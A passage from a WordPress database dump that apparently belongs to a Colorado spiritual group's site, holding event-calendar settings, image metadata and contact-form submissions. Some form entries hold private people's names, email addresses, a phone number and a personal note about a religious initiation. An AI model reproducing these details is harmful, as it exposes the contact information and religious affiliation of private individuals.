Colorado\";i:2;s:8:\"Loveland\";}'),(95612,262066,'_edit_lock','1609185782:2'),(95611,262066,'_EventOrigin','events-calendar'),(95650,262070,'_EventTimezone','America/Denver'),(95651,262070,'_EventTimezoneAbbr','MST'),(95630,262070,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1601131342;s:12:\"_EventOrigin\";i:1601131342;s:13:\"_thumbnail_id\";i:1607506407;s:24:\"boldgrid_hide_page_title\";i:1601131342;s:17:\"_EventShowMapLink\";i:1606903250;s:13:\"_EventShowMap\";i:1606903250;s:15:\"_EventStartDate\";i:1607030943;s:13:\"_EventEndDate\";i:1607030943;s:18:\"_EventStartDateUTC\";i:1607030943;s:16:\"_EventEndDateUTC\";i:1607030943;s:14:\"_EventDuration\";i:1601131342;s:20:\"_EventCurrencySymbol\";i:1601131342;s:22:\"_EventCurrencyPosition\";i:1601131342;s:10:\"_EventCost\";i:1601131342;s:9:\"_EventURL\";i:1601131342;s:14:\"_EventTimezone\";i:1601131342;s:18:\"_EventTimezoneAbbr\";i:1606824340;s:13:\"_EventVenueID\";i:1606824404;s:27:\"_EventNextPendingRecurrence\";i:1601131342;s:12:\"_dp_original\";i:1601131342;s:16:\"tribe_events_cat\";i:1609185835;s:10:\"_edit_last\";i:1601131421;s:10:\"post_title\";i:1606986678;s:12:\"post_content\";i:1607374243;s:26:\"_RTECregistrationsDisabled\";i:1601131568;s:17:\"_RTECdeadlineType\";i:1601131568;s:19:\"_RTECwhoCanRegister\";i:1601131568;s:23:\"_RTEClimitRegistrations\";i:1601131568;s:21:\"_RTECmaxRegistrations\";i:1601131568;s:16:\"_EventRecurrence\";i:1601131568;s:11:\"post_status\";i:1606903250;s:18:\"_RTECnumRegistered\";i:1607797894;}'),(95640,262070,'_EventShowMap',''),(95641,262070,'_EventStartDate','2020-12-13 10:30:00'),(95631,262070,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1601131342;s:12:\"_EventOrigin\";i:1601131342;s:13:\"_thumbnail_id\";i:1607506407;s:24:\"boldgrid_hide_page_title\";i:1601131342;s:17:\"_EventShowMapLink\";i:1606903250;s:13:\"_EventShowMap\";i:1606903250;s:15:\"_EventStartDate\";i:1607030943;s:13:\"_EventEndDate\";i:1607030943;s:18:\"_EventStartDateUTC\";i:1607030943;s:16:\"_EventEndDateUTC\";i:1607030943;s:14:\"_EventDuration\";i:1601131342;s:20:\"_EventCurrencySymbol\";i:1601131342;s:22:\"_EventCurrencyPosition\";i:1601131342;s:10:\"_EventCost\";i:1601131342;s:9:\"_EventURL\";i:1601131342;s:14:\"_EventTimezone\";i:1601131342;s:18:\"_EventTimezoneAbbr\";i:1606824340;s:13:\"_EventVenueID\";i:1606824404;s:27:\"_EventNextPendingRecurrence\";i:1601131342;s:12:\"_dp_original\";i:1601131342;s:16:\"tribe_events_cat\";i:1609185835;s:10:\"_edit_last\";i:1601131421;s:10:\"post_title\";i:1606986678;s:12:\"post_content\";i:1607374243;s:26:\"_RTECregistrationsDisabled\";i:1601131568;s:17:\"_RTECdeadlineType\";i:1601131568;s:19:\"_RTECwhoCanRegister\";i:1601131568;s:23:\"_RTEClimitRegistrations\";i:1601131568;s:21:\"_RTECmaxRegistrations\";i:1601131568;s:16:\"_EventRecurrence\";i:1601131568;s:11:\"post_status\";i:1606903250;s:18:\"_RTECnumRegistered\";i:1607797894;}'),(95639,262070,'_EventShowMapLink',''),(95627,262070,'protect_children',''),(95628,262070,'protect_children',''),(95629,262070,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1601131342;s:12:\"_EventOrigin\";i:1601131342;s:13:\"_thumbnail_id\";i:1607506407;s:24:\"boldgrid_hide_page_title\";i:1601131342;s:17:\"_EventShowMapLink\";i:1606903250;s:13:\"_EventShowMap\";i:1606903250;s:15:\"_EventStartDate\";i:1607030943;s:13:\"_EventEndDate\";i:1607030943;s:18:\"_EventStartDateUTC\";i:1607030943;s:16:\"_EventEndDateUTC\";i:1607030943;s:14:\"_EventDuration\";i:1601131342;s:20:\"_EventCurrencySymbol\";i:1601131342;s:22:\"_EventCurrencyPosition\";i:1601131342;s:10:\"_EventCost\";i:1601131342;s:9:\"_EventURL\";i:1601131342;s:14:\"_EventTimezone\";i:1601131342;s:18:\"_EventTimezoneAbbr\";i:1606824340;s:13:\"_EventVenueID\";i:1606824404;s:27:\"_EventNextPendingRecurrence\";i:1601131342;s:12:\"_dp_original\";i:1601131342;s:16:\"tribe_events_cat\";i:1609185835;s:10:\"_edit_last\";i:1601131421;s:10:\"post_title\";i:1606986678;s:12:\"post_content\";i:1607374243;s:26:\"_RTECregistrationsDisabled\";i:1601131568;s:17:\"_RTECdeadlineType\";i:1601131568;s:19:\"_RTECwhoCanRegister\";i:1601131568;s:23:\"_RTEClimitRegistrations\";i:1601131568;s:21:\"_RTECmaxRegistrations\";i:1601131568;s:16:\"_EventRecurrence\";i:1601131568;s:11:\"post_status\";i:1606903250;s:18:\"_RTECnumRegistered\";i:1607797894;}'),(95626,262070,'_EventOrigin','events-calendar'),(95625,262070,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1601131342;s:12:\"_EventOrigin\";i:1601131342;s:13:\"_thumbnail_id\";i:1607506407;s:24:\"boldgrid_hide_page_title\";i:1601131342;s:17:\"_EventShowMapLink\";i:1606903250;s:13:\"_EventShowMap\";i:1606903250;s:15:\"_EventStartDate\";i:1607030943;s:13:\"_EventEndDate\";i:1607030943;s:18:\"_EventStartDateUTC\";i:1607030943;s:16:\"_EventEndDateUTC\";i:1607030943;s:14:\"_EventDuration\";i:1601131342;s:20:\"_EventCurrencySymbol\";i:1601131342;s:22:\"_EventCurrencyPosition\";i:1601131342;s:10:\"_EventCost\";i:1601131342;s:9:\"_EventURL\";i:1601131342;s:14:\"_EventTimezone\";i:1601131342;s:18:\"_EventTimezoneAbbr\";i:1606824340;s:13:\"_EventVenueID\";i:1606824404;s:27:\"_EventNextPendingRecurrence\";i:1601131342;s:12:\"_dp_original\";i:1601131342;s:16:\"tribe_events_cat\";i:1609185835;s:10:\"_edit_last\";i:1601131421;s:10:\"post_title\";i:1606986678;s:12:\"post_content\";i:1607374243;s:26:\"_RTECregistrationsDisabled\";i:1601131568;s:17:\"_RTECdeadlineType\";i:1601131568;s:19:\"_RTECwhoCanRegister\";i:1601131568;s:23:\"_RTEClimitRegistrations\";i:1601131568;s:21:\"_RTECmaxRegistrations\";i:1601131568;s:16:\"_EventRecurrence\";i:1601131568;s:11:\"post_status\";i:1606903250;s:18:\"_RTECnumRegistered\";i:1607797894;}'),(95624,262070,'protect_children',''),(192833,269146,'mec_in_days','2023-10-07:2023-10-07:10-00-AM:05-00-PM,2023-10-08:2023-10-08:10-00-AM:05-00-PM'),(95613,262066,'_edit_last','2'),(192832,269146,'mec_advanced_days','a:0:{}'),(192831,269146,'mec_repeat_end_at_date',''),(192830,269146,'mec_repeat_end_at_occurrences','9'),(192829,269146,'mec_repeat_end','never'),(95610,262066,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1601119323;s:12:\"_EventOrigin\";i:1601119323;s:10:\"_edit_last\";i:1601119355;s:10:\"post_title\";i:1606986733;s:11:\"post_status\";i:1606986604;s:12:\"post_content\";i:1606826325;s:16:\"tribe_events_cat\";i:1606851325;s:26:\"_RTECregistrationsDisabled\";i:1606826125;s:17:\"_RTECdeadlineType\";i:1606826125;s:19:\"_RTECwhoCanRegister\";i:1606826125;s:23:\"_RTEClimitRegistrations\";i:1606826125;s:21:\"_RTECmaxRegistrations\";i:1606826125;s:16:\"_EventRecurrence\";i:1606826125;s:17:\"_EventShowMapLink\";i:1606826125;s:13:\"_EventShowMap\";i:1606826125;s:13:\"_EventVenueID\";i:1606826125;s:15:\"_EventStartDate\";i:1606826125;s:13:\"_EventEndDate\";i:1606826125;s:18:\"_EventStartDateUTC\";i:1606826125;s:16:\"_EventEndDateUTC\";i:1606826125;s:14:\"_EventDuration\";i:1606826125;s:20:\"_EventCurrencySymbol\";i:1606826125;s:22:\"_EventCurrencyPosition\";i:1606826125;s:10:\"_EventCost\";i:1606826125;s:9:\"_EventURL\";i:1606826125;s:14:\"_EventTimezone\";i:1606826125;s:18:\"_EventTimezoneAbbr\";i:1606826125;s:18:\"_RTECnumRegistered\";i:1606837601;s:22:\"_EventHideFromUpcoming\";i:1606986658;s:13:\"_thumbnail_id\";i:1607077191;}'),(95609,262066,'protect_children',''),(97363,262305,'_VenueOrigin','events-calendar'),(97362,262305,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1606824291;s:12:\"_VenueOrigin\";i:1606824291;s:10:\"_edit_last\";i:1606824306;s:10:\"post_title\";i:1606824306;s:11:\"post_status\";i:1606824306;s:17:\"_EventShowMapLink\";i:1606824306;s:13:\"_EventShowMap\";i:1606824306;s:17:\"_VenueShowMapLink\";i:1606824306;s:13:\"_VenueShowMap\";i:1606824306;s:13:\"_VenueAddress\";i:1606824306;s:10:\"_VenueCity\";i:1606824306;s:13:\"_VenueCountry\";i:1606824306;s:14:\"_VenueProvince\";i:1606824306;s:11:\"_VenueState\";i:1606824306;s:9:\"_VenueZip\";i:1606824306;s:11:\"_VenuePhone\";i:1606824306;s:9:\"_VenueURL\";i:1606824306;s:19:\"_VenueStateProvince\";i:1606824306;s:21:\"_VenueOverwriteCoords\";i:1606824306;s:24:\"boldgrid_hide_page_title\";i:1606824306;}'),(119699,262987,'_field_133','adam'),(160551,266604,'mec_repeat_end_at_occurrences',''),(160550,266604,'mec_repeat_end',''),(160549,266604,'mec_repeat_interval','1'),(160548,266604,'mec_repeat_type',''),(160547,266604,'mec_repeat_status','0'),(97353,262303,'_field_224','Kathleen'),(97354,262303,'_field_225','Holmby'),(97355,262303,'_field_226','awai.etc@gmail.com'),(97356,262303,'_field_227','CA'),(97357,262303,'_field_228','US'),(97358,262303,'_field_229','a:1:{i:0;s:16:\"Colorado Springs\";}'),(97359,262303,'_form_id','21'),(97360,262303,'_seq_num','115'),(97361,262305,'protect_children',''),(104005,262433,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1606990753;s:12:\"_EventOrigin\";i:1606990753;s:13:\"_thumbnail_id\";i:1606990753;s:24:\"boldgrid_hide_page_title\";i:1606990753;s:17:\"_EventShowMapLink\";i:1606990753;s:13:\"_EventShowMap\";i:1606990753;s:15:\"_EventStartDate\";i:1607030855;s:13:\"_EventEndDate\";i:1607031045;s:18:\"_EventStartDateUTC\";i:1607030855;s:16:\"_EventEndDateUTC\";i:1607031045;s:14:\"_EventDuration\";i:1607031045;s:20:\"_EventCurrencySymbol\";i:1606990753;s:22:\"_EventCurrencyPosition\";i:1606990753;s:10:\"_EventCost\";i:1606990753;s:9:\"_EventURL\";i:1606990753;s:14:\"_EventTimezone\";i:1606990753;s:18:\"_EventTimezoneAbbr\";i:1606990753;s:27:\"_EventNextPendingRecurrence\";i:1606990753;s:26:\"_RTECregistrationsDisabled\";i:1606990753;s:17:\"_RTECdeadlineType\";i:1606990753;s:19:\"_RTECwhoCanRegister\";i:1606990753;s:23:\"_RTEClimitRegistrations\";i:1606990753;s:21:\"_RTECmaxRegistrations\";i:1606990753;s:16:\"_EventRecurrence\";i:1606990753;s:18:\"_RTECnumRegistered\";i:1606990753;s:13:\"_EventVenueID\";i:1606991943;s:12:\"_dp_original\";i:1606990753;s:16:\"tribe_events_cat\";i:1609185800;s:10:\"_edit_last\";i:1606990827;s:10:\"post_title\";i:1606990827;s:12:\"post_content\";i:1607074144;s:11:\"post_status\";i:1606990868;}'),(104020,262433,'_EventStartDate','2020-12-19 10:30:00'),(104022,262433,'_EventStartDateUTC','2020-12-19 17:30:00'),(104006,262433,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1606990753;s:12:\"_EventOrigin\";i:1606990753;s:13:\"_thumbnail_id\";i:1606990753;s:24:\"boldgrid_hide_page_title\";i:1606990753;s:17:\"_EventShowMapLink\";i:1606990753;s:13:\"_EventShowMap\";i:1606990753;s:15:\"_EventStartDate\";i:1607030855;s:13:\"_EventEndDate\";i:1607031045;s:18:\"_EventStartDateUTC\";i:1607030855;s:16:\"_EventEndDateUTC\";i:1607031045;s:14:\"_EventDuration\";i:1607031045;s:20:\"_EventCurrencySymbol\";i:1606990753;s:22:\"_EventCurrencyPosition\";i:1606990753;s:10:\"_EventCost\";i:1606990753;s:9:\"_EventURL\";i:1606990753;s:14:\"_EventTimezone\";i:1606990753;s:18:\"_EventTimezoneAbbr\";i:1606990753;s:27:\"_EventNextPendingRecurrence\";i:1606990753;s:26:\"_RTECregistrationsDisabled\";i:1606990753;s:17:\"_RTECdeadlineType\";i:1606990753;s:19:\"_RTECwhoCanRegister\";i:1606990753;s:23:\"_RTEClimitRegistrations\";i:1606990753;s:21:\"_RTECmaxRegistrations\";i:1606990753;s:16:\"_EventRecurrence\";i:1606990753;s:18:\"_RTECnumRegistered\";i:1606990753;s:13:\"_EventVenueID\";i:1606991943;s:12:\"_dp_original\";i:1606990753;s:16:\"tribe_events_cat\";i:1609185800;s:10:\"_edit_last\";i:1606990827;s:10:\"post_title\";i:1606990827;s:12:\"post_content\";i:1607074144;s:11:\"post_status\";i:1606990868;}'),(104019,262433,'_EventShowMap',''),(104021,262433,'_EventEndDate','2020-12-19 11:45:00'),(104023,262433,'_EventEndDateUTC','2020-12-19 18:45:00'),(104007,262433,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1606990753;s:12:\"_EventOrigin\";i:1606990753;s:13:\"_thumbnail_id\";i:1606990753;s:24:\"boldgrid_hide_page_title\";i:1606990753;s:17:\"_EventShowMapLink\";i:1606990753;s:13:\"_EventShowMap\";i:1606990753;s:15:\"_EventStartDate\";i:1607030855;s:13:\"_EventEndDate\";i:1607031045;s:18:\"_EventStartDateUTC\";i:1607030855;s:16:\"_EventEndDateUTC\";i:1607031045;s:14:\"_EventDuration\";i:1607031045;s:20:\"_EventCurrencySymbol\";i:1606990753;s:22:\"_EventCurrencyPosition\";i:1606990753;s:10:\"_EventCost\";i:1606990753;s:9:\"_EventURL\";i:1606990753;s:14:\"_EventTimezone\";i:1606990753;s:18:\"_EventTimezoneAbbr\";i:1606990753;s:27:\"_EventNextPendingRecurrence\";i:1606990753;s:26:\"_RTECregistrationsDisabled\";i:1606990753;s:17:\"_RTECdeadlineType\";i:1606990753;s:19:\"_RTECwhoCanRegister\";i:1606990753;s:23:\"_RTEClimitRegistrations\";i:1606990753;s:21:\"_RTECmaxRegistrations\";i:1606990753;s:16:\"_EventRecurrence\";i:1606990753;s:18:\"_RTECnumRegistered\";i:1606990753;s:13:\"_EventVenueID\";i:1606991943;s:12:\"_dp_original\";i:1606990753;s:16:\"tribe_events_cat\";i:1609185800;s:10:\"_edit_last\";i:1606990827;s:10:\"post_title\";i:1606990827;s:12:\"post_content\";i:1607074144;s:11:\"post_status\";i:1606990868;}'),(104018,262433,'_EventShowMapLink',''),(104024,262433,'_EventDuration','4500'),(104025,262433,'_EventCurrencySymbol',''),(104008,262433,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1606990753;s:12:\"_EventOrigin\";i:1606990753;s:13:\"_thumbnail_id\";i:1606990753;s:24:\"boldgrid_hide_page_title\";i:1606990753;s:17:\"_EventShowMapLink\";i:1606990753;s:13:\"_EventShowMap\";i:1606990753;s:15:\"_EventStartDate\";i:1607030855;s:13:\"_EventEndDate\";i:1607031045;s:18:\"_EventStartDateUTC\";i:1607030855;s:16:\"_EventEndDateUTC\";i:1607031045;s:14:\"_EventDuration\";i:1607031045;s:20:\"_EventCurrencySymbol\";i:1606990753;s:22:\"_EventCurrencyPosition\";i:1606990753;s:10:\"_EventCost\";i:1606990753;s:9:\"_EventURL\";i:1606990753;s:14:\"_EventTimezone\";i:1606990753;s:18:\"_EventTimezoneAbbr\";i:1606990753;s:27:\"_EventNextPendingRecurrence\";i:1606990753;s:26:\"_RTECregistrationsDisabled\";i:1606990753;s:17:\"_RTECdeadlineType\";i:1606990753;s:19:\"_RTECwhoCanRegister\";i:1606990753;s:23:\"_RTEClimitRegistrations\";i:1606990753;s:21:\"_RTECmaxRegistrations\";i:1606990753;s:16:\"_EventRecurrence\";i:1606990753;s:18:\"_RTECnumRegistered\";i:1606990753;s:13:\"_EventVenueID\";i:1606991943;s:12:\"_dp_original\";i:1606990753;s:16:\"tribe_events_cat\";i:1609185800;s:10:\"_edit_last\";i:1606990827;s:10:\"post_title\";i:1606990827;s:12:\"post_content\";i:1607074144;s:11:\"post_status\";i:1606990868;}'),(103997,262433,'protect_children',''),(103998,262433,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1606990753;s:12:\"_EventOrigin\";i:1606990753;s:13:\"_thumbnail_id\";i:1606990753;s:24:\"boldgrid_hide_page_title\";i:1606990753;s:17:\"_EventShowMapLink\";i:1606990753;s:13:\"_EventShowMap\";i:1606990753;s:15:\"_EventStartDate\";i:1607030855;s:13:\"_EventEndDate\";i:1607031045;s:18:\"_EventStartDateUTC\";i:1607030855;s:16:\"_EventEndDateUTC\";i:1607031045;s:14:\"_EventDuration\";i:1607031045;s:20:\"_EventCurrencySymbol\";i:1606990753;s:22:\"_EventCurrencyPosition\";i:1606990753;s:10:\"_EventCost\";i:1606990753;s:9:\"_EventURL\";i:1606990753;s:14:\"_EventTimezone\";i:1606990753;s:18:\"_EventTimezoneAbbr\";i:1606990753;s:27:\"_EventNextPendingRecurrence\";i:1606990753;s:26:\"_RTECregistrationsDisabled\";i:1606990753;s:17:\"_RTECdeadlineType\";i:1606990753;s:19:\"_RTECwhoCanRegister\";i:1606990753;s:23:\"_RTEClimitRegistrations\";i:1606990753;s:21:\"_RTECmaxRegistrations\";i:1606990753;s:16:\"_EventRecurrence\";i:1606990753;s:18:\"_RTECnumRegistered\";i:1606990753;s:13:\"_EventVenueID\";i:1606991943;s:12:\"_dp_original\";i:1606990753;s:16:\"tribe_events_cat\";i:1609185800;s:10:\"_edit_last\";i:1606990827;s:10:\"post_title\";i:1606990827;s:12:\"post_content\";i:1607074144;s:11:\"post_status\";i:1606990868;}'),(103999,262433,'_EventOrigin','events-calendar'),(104000,262433,'protect_children',''),(104001,262433,'protect_children',''),(104002,262433,'protect_children',''),(104003,262433,'protect_children',''),(104004,262433,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1606990753;s:12:\"_EventOrigin\";i:1606990753;s:13:\"_thumbnail_id\";i:1606990753;s:24:\"boldgrid_hide_page_title\";i:1606990753;s:17:\"_EventShowMapLink\";i:1606990753;s:13:\"_EventShowMap\";i:1606990753;s:15:\"_EventStartDate\";i:1607030855;s:13:\"_EventEndDate\";i:1607031045;s:18:\"_EventStartDateUTC\";i:1607030855;s:16:\"_EventEndDateUTC\";i:1607031045;s:14:\"_EventDuration\";i:1607031045;s:20:\"_EventCurrencySymbol\";i:1606990753;s:22:\"_EventCurrencyPosition\";i:1606990753;s:10:\"_EventCost\";i:1606990753;s:9:\"_EventURL\";i:1606990753;s:14:\"_EventTimezone\";i:1606990753;s:18:\"_EventTimezoneAbbr\";i:1606990753;s:27:\"_EventNextPendingRecurrence\";i:1606990753;s:26:\"_RTECregistrationsDisabled\";i:1606990753;s:17:\"_RTECdeadlineType\";i:1606990753;s:19:\"_RTECwhoCanRegister\";i:1606990753;s:23:\"_RTEClimitRegistrations\";i:1606990753;s:21:\"_RTECmaxRegistrations\";i:1606990753;s:16:\"_EventRecurrence\";i:1606990753;s:18:\"_RTECnumRegistered\";i:1606990753;s:13:\"_EventVenueID\";i:1606991943;s:12:\"_dp_original\";i:1606990753;s:16:\"tribe_events_cat\";i:1609185800;s:10:\"_edit_last\";i:1606990827;s:10:\"post_title\";i:1606990827;s:12:\"post_content\";i:1607074144;s:11:\"post_status\";i:1606990868;}'),(92680,261616,'_form_id','13'),(92681,261616,'_seq_num','46'),(92682,261617,'_field_212','John'),(92683,261617,'_field_213','Adams'),(92684,261617,'_field_214','johnadams00@msn.com'),(92685,261617,'_field_215','(720) 375-6907'),(92686,261617,'_field_216','Denver'),(92687,261617,'_field_219','ESA/Initiator-Kimberly Young'),(92688,261617,'_field_220','Kimberly,\n\nI received my invitation to take the 5th initiation and I would like to do so.  Given the conditions of the world have changed lately, how can I get this done?  The pink slip is valid until 5/26/2020.\n\nThanks,\n\nJohn'),(92689,261617,'_form_id','20'),(92690,261617,'_seq_num','1'),(93809,261730,'_form_id','13'),(93810,261730,'_seq_num','51'),(95311,261992,'original-file','2020/09/satsang-bk-1-updraft-pre-smush-original.jpg'),(95312,261992,'smush-info','The file was compressed from 19.69 KB to 17.40 KB saving 11.65 percent using WP-Optimize'),(95314,261992,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:20161;s:12:\"smushed-size\";i:17813;s:15:\"savings-percent\";d:11.6500000000000003552713678800500929355621337890625;}'),(95313,261992,'smush-complete','1'),(192828,269146,'mec_repeat_interval','1'),(192827,269146,'mec_repeat_type','custom_days'),(192826,269146,'mec_repeat_status','1'),(192825,269146,'mec_end_day_seconds','61200'),(73624,254580,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:141;s:6:\"height\";i:217;s:4:\"file\";s:29:\"2020/01/the-sound-of-soul.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"the-sound-of-soul-141x150.jpg\";s:5:\"width\";i:141;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:27:\"the-sound-of-soul-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:29:\"the-sound-of-soul-117x180.jpg\";s:5:\"width\";i:117;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:29:\"the-sound-of-soul-141x150.jpg\";s:5:\"width\";i:141;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(85845,258359,'_wp_attachment_image_alt','The Shariyat Ki Sugmad'),(73623,254580,'_wp_attached_file','2020/01/the-sound-of-soul.jpg'),(73621,254579,'_wp_attached_file','2020/01/the-slow-burning-love-of-god.jpg'),(73622,254579,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:147;s:6:\"height\";i:217;s:4:\"file\";s:40:\"2020/01/the-slow-burning-love-of-god.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"the-slow-burning-love-of-god-147x150.jpg\";s:5:\"width\";i:147;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:38:\"the-slow-burning-love-of-god-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:40:\"the-slow-burning-love-of-god-122x180.jpg\";s:5:\"width\";i:122;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:40:\"the-slow-burning-love-of-god-147x150.jpg\";s:5:\"width\";i:147;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73614,254575,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:144;s:6:\"height\";i:217;s:4:\"file\";s:28:\"2020/01/the-flute-of-god.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"the-flute-of-god-144x150.jpg\";s:5:\"width\";i:144;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"the-flute-of-god-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"the-flute-of-god-119x180.jpg\";s:5:\"width\";i:119;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"the-flute-of-god-144x150.jpg\";s:5:\"width\";i:144;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(121142,263208,'protect_children',''),(121141,263208,'protect_children',''),(121058,263203,'_EventOrigin','events-calendar'),(121094,263203,'_edit_lock','1609645977:2'),(121095,263203,'_edit_last','2'),(121096,263204,'_wp_attached_file','2021/01/eck-wisdom-conquer-fear.jpg'),(121097,263204,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:470;s:6:\"height\";i:264;s:4:\"file\";s:35:\"2021/01/eck-wisdom-conquer-fear.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"eck-wisdom-conquer-fear-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"eck-wisdom-conquer-fear-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"eck-wisdom-conquer-fear-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(118930,262957,'_EventShowMapLink','1'),(118921,262957,'_EventOrigin','events-calendar'),(118138,262871,'protect_children',''),(118139,262871,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513498;s:12:\"_EventOrigin\";i:1607513498;s:13:\"_thumbnail_id\";i:1607513498;s:26:\"_RTECregistrationsDisabled\";i:1607513498;s:17:\"_RTECdeadlineType\";i:1607513498;s:19:\"_RTECwhoCanRegister\";i:1607513498;s:23:\"_RTEClimitRegistrations\";i:1607513498;s:21:\"_RTECmaxRegistrations\";i:1607513498;s:24:\"boldgrid_hide_page_title\";i:1607513498;s:16:\"_EventRecurrence\";i:1607513498;s:17:\"_EventShowMapLink\";i:1607513498;s:13:\"_EventShowMap\";i:1607513498;s:13:\"_EventVenueID\";i:1607513498;s:20:\"_EventCurrencySymbol\";i:1607513498;s:22:\"_EventCurrencyPosition\";i:1607513498;s:10:\"_EventCost\";i:1607513498;s:9:\"_EventURL\";i:1607513498;s:14:\"_EventTimezone\";i:1607513498;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513498;}'),(118896,262956,'_RTECwhoCanRegister','any'),(116765,262872,'_EventStartDate','2021-02-07 